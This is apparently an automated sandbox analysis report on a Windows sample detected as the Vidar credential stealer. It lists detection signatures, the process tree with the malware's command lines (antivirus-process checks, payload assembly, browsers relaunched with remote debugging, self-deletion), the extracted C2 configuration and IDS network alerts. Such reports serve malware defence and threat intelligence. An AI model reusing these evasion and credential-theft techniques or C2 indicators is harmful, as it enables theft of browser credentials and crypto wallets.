Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
trZG6pItZj.exe

Overview

General Information

Sample name:trZG6pItZj.exe
renamed because original name is a hash value
Original sample name:1b31c291993985499cf544cc549e9028.exe
Analysis ID:1579620
MD5:1b31c291993985499cf544cc549e9028
SHA1:068d213d11e48f8dda5d90a96512b8101f29ad9e
SHA256:f8615202ee1e9ccb7509f98c643b7bd6e01e439c57b78fd547cf96fd27ec5a47
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • trZG6pItZj.exe (PID: 1088 cmdline: "C:\Users\user\Desktop\trZG6pItZj.exe" MD5: 1B31C291993985499CF544CC549E9028)
    • cmd.exe (PID: 1672 cmdline: "C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5776 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6496 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3868 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5964 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3440 cmdline: cmd /c md 139308 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5968 cmdline: findstr /V "Frame" Ron MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1440 cmdline: cmd /c copy /b ..\Brochure + ..\Divine + ..\Surgery + ..\Posting j MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Procedures.com (PID: 1576 cmdline: Procedures.com j MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 2292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 6152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 --field-trial-handle=2356,i,7400359050630250975,17873444057706261600,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 7668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7888 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2592 --field-trial-handle=2492,i,16554835861634890053,15790992392374855556,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3780 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2372,i,14569064523681728109,8577273085743409208,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • cmd.exe (PID: 2812 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\139308\Procedures.com" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 3116 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 5532 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 7904 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7272 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2052,i,14059903290940015210,10677024805754499588,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 5668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2744 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7728 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6748 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7696 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6900 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.Procedures.com.3fb0000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                Sigma Signatures

                Sigma detected: Browser Started with Remote Debugging
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Procedures.com j, ParentImage: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, ParentProcessId: 1576, ParentProcessName: Procedures.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2292, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1672, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5964, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:23:49.871078+010020442471Malware Command and Control Activity Detected94.130.188.57443192.168.2.549767TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:23:52.173133+010020518311Malware Command and Control Activity Detected94.130.188.57443192.168.2.549772TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:23:52.172957+010020490871A Network Trojan was detected192.168.2.54977294.130.188.57443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:23:45.287338+010028593781Malware Command and Control Activity Detected192.168.2.54975494.130.188.57443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Multi AV Scanner detection for submitted file
                Source: trZG6pItZj.exeReversingLabs: Detection: 18%
                Source: trZG6pItZj.exeVirustotal: Detection: 26%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
                Source: trZG6pItZj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49745 version: TLS 1.2
                Source: trZG6pItZj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00E8DC54
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00E9A087
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00E9A1E2
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00E8E472
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00E9A570
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E966DC FindFirstFileW,FindNextFileW,FindClose,11_2_00E966DC
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E5C622 FindFirstFileExW,11_2_00E5C622
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00E973D4
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E97333 FindFirstFileW,FindClose,11_2_00E97333
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00E8D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139308Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139308\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 10MB later: 38MB

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49772 -> 94.130.188.57:443
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.57:443 -> 192.168.2.5:49772
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.57:443 -> 192.168.2.5:49767
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49754 -> 94.130.188.57:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.32
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.92
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.75
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.73.24
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9D889 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_00E9D889
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b2?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=19Abb18dd40861f844b83d11734931476; XID=19Abb18dd40861f844b83d11734931476
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734931474876&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f980c21c7474272aa4243416d38e40b&activityId=7f980c21c7474272aa4243416d38e40b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0DA4B0A2ABA24210907773DA18D43FAE&MUID=2DB99B69D85C6DF817C28E37D9F46CAD HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; SM=T
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
